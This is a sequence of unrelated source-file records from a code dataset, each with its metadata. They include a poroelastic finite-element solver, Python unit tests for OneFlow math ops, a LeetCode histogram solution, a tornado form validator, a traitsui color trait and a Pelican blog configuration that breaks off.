(self.dof_map[:,1][self.connect]).reshape(-1,9) \n \n #The DOF indices cooresponding to pressure, they should not have any -1's\n #because we only choose those that in the first 4 columns of each row in\n #the connectivity\n id_pres = self.dof_map[:,-1][self.connect[:,:4]]\n \n #Integrate element stiffness matrices\n K, Q, H, S = self.integrate_element_matrices()\n\n #Integrate RHS\n self.Fgu_old = np.zeros((self.num_elem,9,1))\n \n Fgu, Fgp = self.integrate_RHS() \n \n #Assemble into global stiffness matrix\n for i in range(self.num_elem):\n \n # Add elastic stiffness matrix \n idx_grid_disp = np.ix_(id_disp[i], id_disp[i])\n self.Mat_K[idx_grid_disp] += -1*K[i]\n \n # Add coupling matrix\n idx_grid_pres = np.ix_(id_disp[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += Q[i]\n \n # Add transposed coupling matrix\n idx_grid_pres = np.ix_(id_pres[i], id_disp[i])\n self.Mat_K[idx_grid_pres] += Q[i].T\n\n # Add Storativity Matrix \n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += S[i]\n\n # Add Fluid Permeability Matrix\n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K[idx_grid_pres] += H[i] * self.delta_t / 2\n\n\n #Assemble into global stiffness matrix for RHS\n \n # Add elastic stiffness matrix \n idx_grid_disp = np.ix_(id_disp[i], id_disp[i])\n self.Mat_K_n[idx_grid_disp] += -1*K[i]\n \n # Add coupling matrix\n idx_grid_pres = np.ix_(id_disp[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] += Q[i]\n \n # Add transposed coupling matrix\n idx_grid_pres = np.ix_(id_pres[i], id_disp[i])\n self.Mat_K_n[idx_grid_pres] += Q[i].T\n\n # Add Storativity Matrix \n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] += S[i]\n\n # Add Fluid Permeability Matrix\n idx_grid_pres = np.ix_(id_pres[i], id_pres[i])\n self.Mat_K_n[idx_grid_pres] -= H[i] * self.delta_t / 2\n\n #Institute Body Forces (grav)\n \n # Add displacement body force\n idy_vec_disp = np.ix_(idy_disp[i])\n self.Vec_F[idy_vec_disp] -= (Fgu[i].ravel() - self.Fgu_old[i].ravel()) / self.delta_t\n \n idx_vec_pres = np.ix_(id_pres[i])\n self.Vec_F[idx_vec_pres] += Fgp[i].ravel()\n \n def apply_essential_bc(self, nodes, values, dof=\"x\"):\n \n node_idx = nodes - 1\n \n if dof == \"x\":\n dof_idx = 0\n elif dof == \"y\":\n dof_idx = 1\n elif dof == \"p\":\n dof_idx = 2\n \n row_replace = np.zeros(len(self.Mat_K))\n \n for value_idx, node in enumerate(node_idx): \n \n row_idx = self.dof_map[node][dof_idx]\n \n self.Mat_K[row_idx] = row_replace\n 
self.Mat_K[row_idx,row_idx] = 1\n self.Vec_F[row_idx] = values[value_idx]\n \n \n def solve(self):\n \n self.Mat_K = scipy.sparse.csr_matrix(self.Mat_K)\n self.Mat_K_n = scipy.sparse.csr_matrix(self.Mat_K)\n self.Vec_F = self.Mat_K_n*self.Vec_F + self.delta_t*self.Vec_F\n \n return scipy.sparse.linalg.spsolve(self.Mat_K,self.Vec_F)\n################################################################################\n \ncoords = np.loadtxt(\"coords.csv\", delimiter=',', dtype=np.double)\nconnect = np.loadtxt(\"connect.csv\", delimiter=',', dtype=np.int64)\nns1 = np.loadtxt(\"nodeset1.csv\", delimiter=',', dtype=np.int64)\nns2 = np.loadtxt(\"nodeset2.csv\", delimiter=',', dtype=np.int64)\nns3 = np.loadtxt(\"nodeset3.csv\", delimiter=',', dtype=np.int64)\nns4 = np.loadtxt(\"nodeset4.csv\", delimiter=',', dtype=np.int64)\n\n# Load from .exo file\n\nnc = netCDF4.Dataset('Inclusion2D_Coarse.exo')\nconnect1 = nc.variables['connect1'][:]\nconnect2 = nc.variables['connect2'][:]\nconnect3 = nc.variables['connect3'][:]\n\nconnect = np.vstack( (connect1,connect2,connect3))\ncoordx = nc.variables['coordx'][:]\ncoordy = nc.variables['coordy'][:]\ncoords = np.vstack((coordx,coordy)).T\n\nleft = nc.variables['node_ns2'][:]\nfloor = nc.variables['node_ns3'][:]\nright = nc.variables['node_ns4'][:]\ntop = nc.variables['node_ns5'][:]\n\n\nproblem = TwoDimCoupledFEM(coords, connect, nu=0.3, mu=9722223330304.0, alpha=0.8)\n\nproblem.assemble()\n\nproblem.apply_essential_bc(floor,np.zeros(len(floor)),dof=\"y\")\n\n#problem.apply_essential_bc(floor,np.ones(len(floor))*100,dof=\"p\")\nproblem.apply_essential_bc(left,np.zeros(len(left)),dof=\"x\")\nproblem.apply_essential_bc(right,np.zeros(len(right)),dof=\"x\")\n\nproblem.apply_essential_bc(top,np.zeros(len(top)),dof=\"p\")\n#problem.apply_essential_bc(ns4,np.zeros(len(ns4)),dof=\"x\")\n\n#ns1 includes displacement nodes on the interior, we can't apply pressure\n#to these, so first we modify ns1 to include only pressure nodes\nns1_pres = np.intersect1d(ns1,connect[:,:4].flatten())\n#problem.apply_essential_bc(ns1_pres,5*np.ones(len(ns1_pres)),dof=\"p\")\n#Same for ns2\nns2_pres = np.intersect1d(ns2,connect[:,:4].flatten())\n#problem.apply_essential_bc(ns2_pres,500*6894*np.ones(len(ns2_pres)),dof=\"p\")\n\nx = problem.solve()\n\ndisplacement = x[problem.dof_map[:,:2].flatten()].reshape(-1,2)\ndeformed_pos = coords + displacement\n\npres_dof = problem.dof_map[:,-1][np.where(problem.dof_map[:,-1] != -1)]\npressure = x[pres_dof]\n\n\n################################################################################ \n# Plots\n\npatches = []\nfor coord in coords[connect[:,0:4]-1]:\n quad = Polygon(coord, facecolor='none', fill=False)\n patches.append(quad)\n\npres_idx, = np.where(problem.dof_map[:,-1] != -1)\nX = coords[pres_idx,0]\nY = coords[pres_idx,1]\ngrid_x, grid_y = np.mgrid[0:50:1000j, 0:-50:1000j]\np = scipy.interpolate.griddata((X, Y), pressure, (grid_x, grid_y), method='cubic')\n\nX = coords[:,0]\nY = coords[:,1]\nu_x = scipy.interpolate.griddata((X, Y), displacement[:,0], (grid_x, grid_y), method='cubic')\nu_y = scipy.interpolate.griddata((X, Y), displacement[:,1], (grid_x, grid_y), method='cubic')\ndisplacement_mag = np.sqrt(displacement[:,0] * displacement[:,0] + displacement[:,1] * displacement[:,1])\ndisp_mag = scipy.interpolate.griddata((X, Y), displacement_mag, (grid_x, grid_y), method='cubic')\ninterior = np.sqrt((grid_x**2 / 0.8**2) + (grid_y**2 / 1**2)) < 1\np[interior] = np.nan\n\nfig, ax = plt.subplots()\ncs = ax.contourf(grid_x, grid_y, p, 
cmap=\"coolwarm\") #,levels=np.linspace(-2, 5, 50))\nfig.colorbar(cs, ax=ax);\n#colors = 100 * np.random.rand(len(patches))\n\n\np = PatchCollection(patches, match_original=True)\np.set_linewidth(0.1)\n \n#p.set_array(np.array(colors))\nax.add_collection(p)\nax.set_xlim([0, 50])\nax.set_ylim([-50,0])\nax.set_aspect('equal') \n# \n# #Sigma xx\n\n#stress = problem.compute_stress(displacement).reshape(-1,3)\n#x_gauss_pt, y_gauss_pt = problem.compute_gauss_point_locations(deformed_pos)\n\n\n#stress_x = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,0], (grid_x, grid_y), method='cubic')\n#stress_y = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,1], (grid_x, grid_y), method='cubic')\n#stress_xy = scipy.interpolate.griddata((x_gauss_pt, y_gauss_pt), stress[:,2], (grid_x, grid_y), method='cubic')\n##stress_x[interior] = np.nan\n##stress_y[interior] = np.nan\n##stress_xy[interior] = np.nan\n\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_x, cmap=\"coolwarm\",levels=np.linspace(-1, 2, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{xx}$\");\n\n\n# Sigma yy\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_y, cmap=\"coolwarm\",levels=np.linspace(-1, 2, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{yy}$\");\n\n### Sigma xy\n\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, stress_xy, cmap=\"coolwarm\",levels=np.linspace(-1, 1, 50))\n#plt.colorbar();\n#plt.title(\"$\\sigma_{xy}$\");\n# \n# \n## X Disp\n\n#X = coords[:,0]\n#Y = coords[:,1]\n#disp_x = scipy.interpolate.griddata((X, Y), displacement[:,0], (grid_x, grid_y), method='cubic')\n##disp_x[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_x, cmap=\"coolwarm\")\n#plt.colorbar();\n#plt.title(\"X displacement\");\n\n## Y Disp\n\n#disp_y = scipy.interpolate.griddata((X, Y), displacement[:,1], (grid_x, grid_y), method='cubic')\n##disp_y[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_y, cmap=\"coolwarm\")\n#plt.colorbar();\n#plt.title(\"Y displacement\");\n\n## Disp Magnitude\n\n#displacement_mag = np.sqrt(displacement[:,0] * displacement[:,0] + displacement[:,1] * displacement[:,1])\n#disp_mag = scipy.interpolate.griddata((X, Y), displacement_mag, (grid_x, grid_y), method='cubic')\n##disp_mag[interior] = np.nan\n#plt.figure()\n#plt.gca().set_aspect('equal')\n#plt.contourf(grid_x, grid_y, disp_mag, cmap=\"coolwarm\")#,levels=np.linspace(0.0, 0.06, 50))\n#plt.colorbar();\n#plt.title(\"Displacement Magnitude\"); \n","sub_path":"src/test/2DCoupledFE.py","file_name":"2DCoupledFE.py","file_ext":"py","file_size_in_byte":23136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"86976682","text":"class Person:\n def __init__(self, name, birth_year, gender, mother=None, father=None):\n self.name = name\n self.birth_year = birth_year\n self.gender = gender\n self.kids = []\n self.mother = mother\n self.father = father\n\n if self.mother:\n self.mother.kids.append(self)\n\n if self.father:\n self.father.kids.append(self)\n\n def children(self, **kwargs):\n if kwargs:\n child = []\n for x in self.kids:\n if x.gender == kwargs['gender']:\n child.append(x)\n return child\n\n else:\n return self.kids\n\n def get_brothers(self):\n return list(self.all_siblings(gender='M'))\n\n def get_sisters(self):\n return list(self.all_siblings(gender='F'))\n\n def is_direct_successor(self, 
successor):\n\n if successor in self.kids:\n return True\n\n def all_siblings(self, gender):\n all_kids = set(self.mother.children() + self.father.children())\n siblings = set(sibling for sibling in all_kids\n if sibling is not self and sibling.gender == gender)\n\n return siblings\n\n","sub_path":"task3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"110160674","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport oneflow as flow\nimport unittest\nimport numpy as np\n\n\n@unittest.skipIf(\n not flow.unittest.env.eager_execution_enabled(),\n \".numpy() doesn't work in lazy mode\",\n)\nclass TestMathModule(flow.unittest.TestCase):\n def test_sin(test_case):\n input = flow.Tensor(np.random.randn(2, 6, 5, 3), dtype=flow.float32)\n of_out = flow.sin(input)\n np_out = np.sin(input.numpy())\n test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))\n test_case.assertTrue(np.allclose(input.sin().numpy(), np_out, 1e-5, 1e-5))\n\n arr = np.array([-0.5461, 0.1347, -2.7266, -0.2746])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out2 = np.array([-0.51935846, 0.13429303, -0.40318328, -0.27116194])\n of_out2 = flow.sin(input2)\n test_case.assertTrue(np.allclose(of_out2.numpy(), np_out2, 1e-5, 1e-5))\n\n def test_cos(test_case):\n input = flow.Tensor(np.random.randn(1, 3, 6), dtype=flow.float32)\n of_out = flow.cos(input)\n np_out = np.cos(input.numpy())\n test_case.assertTrue(np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5))\n test_case.assertTrue(np.allclose(input.cos().numpy(), np_out, 1e-5, 1e-5))\n\n arr = np.array([1.4309, 1.2706, -0.8562, 0.9796])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out2 = np.array([0.13944048, 0.29570782, 0.6553126, 0.5573547])\n of_out2 = flow.cos(input2)\n test_case.assertTrue(np.allclose(of_out2.numpy(), np_out2))\n\n def test_log(test_case):\n input = flow.Tensor(np.random.randn(2, 3, 4, 5), dtype=flow.float32)\n of_out = flow.log(input)\n np_out = np.log(input.numpy())\n test_case.assertTrue(\n np.allclose(of_out.numpy(), np_out, 1e-5, 1e-5, equal_nan=True)\n )\n test_case.assertTrue(np.allclose(input.log().numpy(), np_out, equal_nan=True))\n\n arr = np.array([-0.7168, -0.5471, -0.8933, -1.4428, -0.1190])\n input2 = flow.Tensor(arr, dtype=flow.float32)\n np_out = np.full((5,), np.nan)\n of_out2 = flow.log(input2)\n test_case.assertTrue(\n np.allclose(of_out2.numpy(), np_out, 1e-5, 1e-5, equal_nan=True)\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"oneflow/python/test/modules/test_math_ops.py","file_name":"test_math_ops.py","file_ext":"py","file_size_in_byte":2835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"158552900","text":"\"\"\"\n84. 
Largest Rectangle in Histogram\n\nGiven n non-negative integers representing the histogram's bar height where the width of each bar is 1, find the area of largest rectangle in the histogram.\n\nAbove is a histogram where width of each bar is 1, given height = [2,1,5,6,2,3].\n\nThe largest rectangle is shown in the shaded area, which has area = 10 unit.\n\nExample:\n\nInput: [2,1,5,6,2,3]\nOutput: 10\n\nExpected Results:\n\n0. Test Case : {'expected': 10, 'heights': [2, 1, 5, 6, 2, 3]}\n - Result 1 : 10\n - Result 2 : 10\n - Assert : True\n\n1. Test Case : {'expected': 4, 'heights': [2, 1, 4]}\n - Result 1 : 4\n - Result 2 : 4\n - Assert : True\n\n2. Test Case : {'expected': 2, 'heights': [2]}\n - Result 1 : 2\n - Result 2 : 2\n - Assert : True\n\n3. Test Case : {'expected': 0, 'heights': []}\n - Result 1 : 0\n - Result 2 : 0\n - Assert : True\n\n\"\"\"\n\nfrom copy import deepcopy\n\nclass Solution:\n\n def largestRectangleArea1(self, heights):\n res, stk, i = 0, [], 0\n heights.append(0)\n\n while i < len(heights):\n if len(stk) == 0 or heights[stk[-1]] <= heights[i]:\n stk.append(i)\n i += 1\n else:\n past_idx = stk.pop()\n h = heights[past_idx]\n w = i\n if stk: w = i - stk[-1] - 1\n res = max(res, h*w)\n return res\n \n def largestRectangleArea2(self, heights):\n res, stk, heights = 0, [], [0] + heights + [0]\n for i in range(len(heights)):\n while stk and heights[stk[-1]] > heights[i]:\n j = stk.pop()\n res = max(res, (i-stk[-1]-1) * heights[j])\n stk.append(i)\n return res\n\n def test(self):\n test_cases = [\n { \"expected\": 10, \"heights\": [2,1,5,6,2,3] },\n { \"expected\": 4, \"heights\": [2,1,4] },\n { \"expected\": 2, \"heights\": [2] },\n { \"expected\": 0, \"heights\": [] }\n ]\n for i, test_case in enumerate(test_cases):\n heights, expected = test_case['heights'], test_case['expected']\n print(f\"\\n{i}. Test Case : {test_case}\")\n res1 = self.largestRectangleArea1(deepcopy(heights))\n res2 = self.largestRectangleArea2(deepcopy(heights))\n print(f\" - Result 1 : {res1}\")\n print(f\" - Result 2 : {res2}\")\n print(f\" - Assert : {expected == res1 == res2}\")\n\nif __name__ == '__main__':\n Solution().test()\n\n","sub_path":"mock/hard/stack/84_largest_rentangle_in_histogram.py","file_name":"84_largest_rentangle_in_histogram.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"197481070","text":"\n\n#calss header\nclass _LAWMAKER():\n\tdef __init__(self,): \n\t\tself.name = \"LAWMAKER\"\n\t\tself.definitions = [u'someone, such as a politician, who is responsible for making and changing laws']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_lawmaker.py","file_name":"_lawmaker.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"408827173","text":"# (C) Copyright 2004-2021 Enthought, Inc., Austin, TX\n# All rights reserved.\n#\n# This software is provided without warranty under the terms of the BSD\n# license included in LICENSE.txt and may be redistributed only under\n# the conditions described in the aforementioned license. 
The license\n# is also available online at http://www.enthought.com/licenses/BSD.txt\n#\n# Thanks for using Enthought open source!\n\n\"\"\" Trait definition for an RGB-based color, which is a tuple of the form\n (*red*, *green*, *blue*), where *red*, *green* and *blue* are floats in the\n range from 0.0 to 1.0.\n\"\"\"\n\n\nfrom traits.api import Trait, TraitError\nfrom traits.trait_base import SequenceTypes\n\nfrom traitsui.qt4.color_trait import standard_colors\n\n# -------------------------------------------------------------------------\n# Convert a number into an RGB tuple:\n# -------------------------------------------------------------------------\n\n\ndef range_check(value):\n \"\"\" Checks that *value* can be converted to a value in the range 0.0 to 1.0.\n\n If so, it returns the floating point value; otherwise, it raises a\n TraitError.\n \"\"\"\n value = float(value)\n if 0.0 <= value <= 1.0:\n return value\n raise TraitError\n\n\ndef convert_to_color(object, name, value):\n \"\"\" Converts a tuple or an integer to an RGB color value, or raises a\n TraitError if that is not possible.\n \"\"\"\n if isinstance(value, SequenceTypes) and len(value) == 3:\n return (\n range_check(value[0]),\n range_check(value[1]),\n range_check(value[2]),\n )\n if isinstance(value, int):\n return (\n (value / 0x10000) / 255.0,\n ((value // 0x100) & 0xFF) / 255.0,\n (value & 0xFF) / 255.0,\n )\n raise TraitError\n\n\nconvert_to_color.info = (\n \"a tuple of the form (r,g,b), where r, g, and b \"\n \"are floats in the range from 0.0 to 1.0, or an integer which in hex is of \"\n \"the form 0xRRGGBB, where RR is red, GG is green, and BB is blue\"\n)\n\n# -------------------------------------------------------------------------\n# Standard colors:\n# -------------------------------------------------------------------------\n\n# RGB versions of standard colors:\nrgb_standard_colors = {}\nfor name, color in standard_colors.items():\n rgb_standard_colors[name] = (color.redF(), color.greenF(), color.blueF())\n\n# -------------------------------------------------------------------------\n# Define wxPython specific color traits:\n# -------------------------------------------------------------------------\n\n### Note: Declare the editor to be a function which returns the RGBColorEditor\n# class from traits ui to avoid circular import issues. For backwards\n# compatibility with previous Traits versions, the 'editors' folder in Traits\n# project declares 'from api import *' in its __init__.py. The 'api' in turn\n# can contain classes that have a RGBColor trait which lead to this file getting\n# imported. 
This will lead to a circular import when declaring a RGBColor\n# trait.\n\n\ndef get_rgb_color_editor(*args, **traits):\n from .rgb_color_editor import ToolkitEditorFactory\n\n return ToolkitEditorFactory(*args, **traits)\n\n\n# Trait whose value must be an RGB color:\nRGBColor = Trait(\n \"white\", convert_to_color, rgb_standard_colors, editor=get_rgb_color_editor\n)\n","sub_path":"venv/lib/python3.8/site-packages/traitsui/qt4/rgb_color_trait.py","file_name":"rgb_color_trait.py","file_ext":"py","file_size_in_byte":3346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"359549459","text":"import sqlite3\nfrom todos import TaskManager, Action_add\n\nconn = sqlite3.connect('ma_base.db')\n\ncursor = conn.cursor()\ncursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS taches(\n id INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT,\n description TEXT,\n numero INTEGER,\n statut TEXT\n)\n\"\"\")\n\nconn.commit()\n\ncursor.execute(\"\"\"\nINSERT INTO taches(name, description, numero, statut) VALUES(?, ?, ?, ?)\"\"\", (\"add\", \"first task\", 1, \"à faire\"))\n\nconn.commit()\n\ncursor.execute(\"\"\"SELECT name, description, numero, statut FROM taches\"\"\")\nuser1 = cursor.fetchone()\nprint(user1)\n\nconn.commit()\n\nconn.close()","sub_path":"todos_final.py","file_name":"todos_final.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"632356535","text":"# -*- coding: utf-8 -*- #\nimport sys\nimport argparse\nimport re\nimport os\nimport random\nfrom collections import defaultdict\n\ndef get_args():\n parser = argparse.ArgumentParser(description = \"Mondat elemzes\")\n parser.add_argument(\"a_file\", type = str, help = \"file path\")\n parser.add_argument(\"b_file\", type = str, help = \"file path\")\n parser.add_argument(\"output\", type = str, help = \"file path\")\n return parser.parse_args()\n\ndef change(a_file, b_file, output):\n datas_sentence = []\n with open(a_file, \"r\", encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n if line == \"\\n\":\n continue\n if line.startswith(\"#\"):\n continue\n if line.startswith(\"Sum:\"):\n continue\n if line!=\"\\n\":\n field = line.split(\" \")\n sid = field[0]\n word1 = field[1]\n pos1 = field[2]\n word2 = field[3]\n pos2 = field[4]\n edge = field[5]\n\n data = {'sid': sid, 'word1' : word1, 'pos1' : pos1, 'word2': word2, 'pos2': pos2, 'edge': edge} \n datas_sentence.append(data)\n\n datas_sentence2 = []\n with open(b_file, \"r\", encoding='utf-8') as g:\n lines2 = g.readlines()\n for line2 in lines2:\n if line2 == \"\\n\":\n continue\n if line2.startswith(\"#\"):\n continue\n if line2.startswith(\"Sum:\"):\n continue\n if line2!=\"\\n\":\n fieldb = line2.split(\" \")\n sidb = fieldb[0]\n word1b = fieldb[1]\n pos1b = fieldb[2]\n word2b = fieldb[3]\n pos2b = fieldb[4]\n edgeb = fieldb[5]\n\n datab2 = {'sid': sidb, 'word1' : word1b, 'pos1' : pos1b, 'word2': word2b, 'pos2': pos2b, 'edge': edgeb} \n datas_sentence2.append(datab2)\n\n \n datas_compare= []\n for i in range(0, len(datas_sentence)):\n for j in range(0, len(datas_sentence2)):\n if ((datas_sentence[i]['sid'] == datas_sentence2[j]['sid']) and (datas_sentence[i]['word2'] == datas_sentence2[j]['word2'])) :\n datas_compare.append(datas_sentence[i]['sid'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence[i]['word1'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence[i]['word2'])\n 
datas_compare.append(' ')\n datas_compare.append(datas_sentence2[j]['word1'])\n datas_compare.append(' ')\n datas_compare.append(datas_sentence2[j]['word2'])\n datas_compare.append('\\n')\n \n\n \n with open(output, \"w\", encoding='utf-8') as z:\n for i in range(0, len(datas_compare)):\n for j in range(0, len(datas_compare[i])):\n #z.write ('Sum:', len(datas_compare))\n z.write(datas_compare[i][j])\n \n\ndef main():\n args = get_args()\n change(args.a_file, args.b_file, args.output)\n\nif __name__ == \"__main__\":\n main()","sub_path":"semantic parsing/code/filter_train_3input.py","file_name":"filter_train_3input.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"284017269","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport tornado.ioloop\nimport tornado.web\nfrom hashlib import sha1\nimport os, time\nimport re\n\n\n# 创建form类\nclass MainForm(object):\n # 初始化\n def __init__(self):\n self.host = \"(.*)\"\n self.ip = \"^(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)(\\.(25[0-5]|2[0-4]\\d|[0-1]?\\d?\\d)){3}$\"\n self.port = '(\\d+)'\n self.phone = '^1[3|4|5|8][0-9]\\d{8}$'\n\n # 验证\n def check_valid(self, request):\n # 循环当前类中的成员,注意此种方法\n\n flag = True\n value_dict = {}\n\n for key, regular in self.__dict__.items():\n '''\n 通过request.get_argument()来获取用户前端输入的值\n 在循环时,不需要关心前端输入值的个数,这里以自定义方法为主\n '''\n post_value = request.get_argument(key)\n # 前端提交的数据与自定义的正则表达式进行匹配验证\n ret = re.match(regular, post_value)\n print(key,\"---------\",ret, \"---------\",post_value)\n\n # 如果结果 结果为None时候,即只要有一项不匹配,就返回false,flag = False\n if not ret:\n flag = False\n # {\"ip\":192.168.1.1,\"port\":8080,....}\n value_dict[key] = post_value\n # print(value_dict)\n return flag,value_dict\n\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self):\n self.render('index.html')\n\n def post(self, *args, **kwargs):\n obj = MainForm()\n is_valid, value_dict= obj.check_valid(self)\n # self.write('ok')\n # 如果全部验证成功,则打印\n if is_valid:\n print(value_dict)\n self.write(\"ok\")\n\n\nsettings = {\n 'template_path': 'templates',\n 'static_path': 'statics',\n 'static_url_prefix': '/static/',\n 'cookie_secret': 'aiuasdhflashjdfoiuashdfiuh',\n 'login_url': '/login'\n}\n\napplication = tornado.web.Application([\n (r\"/index\", MainHandler),\n], **settings)\n\nif __name__ == \"__main__\":\n print(\"http://127.0.0.1:8888/index\")\n application.listen(8888)\n tornado.ioloop.IOLoop.instance().start()\n\n\n## 不能区分是哪里错了\n","sub_path":"11tornado_form/form10.py","file_name":"form10.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450792295","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Jiheng Hu'\nSITENAME = \"Jiheng's Blog\"\nSITEURL = 'https://jihenghu.github.io'\n\nPATH ='content'\n\nTIMEZONE ='Asia/Shanghai'\n#DATE_FORMATS = {'zh':'%Y-%m-%d %H:%M'}\nDATE_FORMATS = {'en': '%a, %d %b %Y %H:%M'}\nTHEME ='pelican-elegant'\nDISQUS_SITENAME = 'jihenghu'\n\nCOMMENTS_INTRO = \"Disqus isn't stable due to poor network, email is highly recommended, `hjh18305@gmail.com`\"\nDEFAULT_LANG = 'zh'\n\n##### plugins \n## 插件目录\nPLUGIN_PATHS = [u\"pelican-plugins\"]\n#PLUGINS = [u\"neighbors\",u\"related_posts\",\"tag_cloud\",\"share_post\",\"sitemap\",\"tipue_search\",\"extract_toc\"]#,\"multi_part\"]\nPLUGINS = 
[u\"neighbors\",u\"related_posts\",\"tag_cloud\",\"share_post\",\"sitemap\",\"extract_toc\",\"series\"]#,\"multi_part\",\"tipue_search\"]\n\nUSE_SHORTCUT_ICONS = True\nSITELOGO = 'images/favicon.ico'\nFAVICON = 'images/favicon.ico'\nSITELOGO_SIZE = 15\n\n#MD_EXTENSIONS = ['codehilite(css_class=highlight)', 'extra', 'headerid', 'toc']\n# Markdown extensions to use...\n# The following line is deprecated for versions >= 3.7. However, I will leave this in here for backward compatibility for now (since some plugins have not been ported to 3.7.0).\n#MD_EXTENSIONS = ['fenced_code', 'codehilite(css_class=highlight, linenums=True)', 'toc', 'markdown.extensions.abbr', 'markdown.extensions.footnotes', 'markdown.extensions.tables', ]\n\n# For Pelican version >= 3.7 you will need the following...\nMARKDOWN = {\n 'extension_configs' : {\n 'markdown.extensions.codehilite' : {'css_class': 'highlight', 'linenums': True},\n 'markdown.extensions.abbr' : {},\n 'markdown.extensions.footnotes' : {},\n 'markdown.extensions.tables' : {},\n 'markdown.extensions.toc' : {'permalink': True},\n 'markdown.extensions.fenced_code' : {}\n }\n}\n\n\nDIRECT_TEMPLATES = (('index', 'tags', 'categories','archives', 'search', '404'))\n\nSITESUBTITLE = 'Glory Glory Man. United'\n\nMAILCHIMP_FORM_ACTION = 'https://facebook.us17.list-manage.com/subscribe/post?u=c5b98e725c643897fdbd8e8c3&id=248afa8728'\n\n## 配置sitemap 插件\nSITEMAP = {\n \"format\": \"xml\",\n \"priorities\": {\n \"articles\": 0.7,\n \"indexes\": 0.5,\n \"pages\": 0.3,\n },\n \"changefreqs\": {\n \"articles\": \"monthly\",\n \"indexes\": \"daily\",\n \"pages\": \"monthly\",\n }\n}\n## 设置URL按照日期显示\n#ARTICLE_URL = 'categories/{slug}.html'\n#ARTICLE_SAVE_AS = ARTICLE_URL\n\n## 分页\nDEFAULT_PAGINATION = 10\n\n## 静态目录设置\nSTATIC_PATHS = [\"images\",\"pdfs\"]\n\n## 顶部菜单项\n#MENUITEMS = [('archives',SITEURL+'/archives.html'),]\n\nUSE_FOLDER_AS_CATEGORY = True\n\nARTICLE_URL = '{category}/{slug}.html'\nARTICLE_SAVE_AS = ARTICLE_URL\nPAGE_URL = '{slug}.html'\nPAGE_SAVE_AS = PAGE_URL\n\nCATEGORY_URL = 'categories/{slug}.html'\nCATEGORY_SAVE_AS = CATEGORY_URL\nCATEGORIES_SAVE_AS = 'categories.html'\n\nTAG_URL = 'tags/{slug}.html'\nTAG_SAVE_AS = TAG_URL\nTAGS_SAVE_AS = 'tags.html' \n\n\n\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = 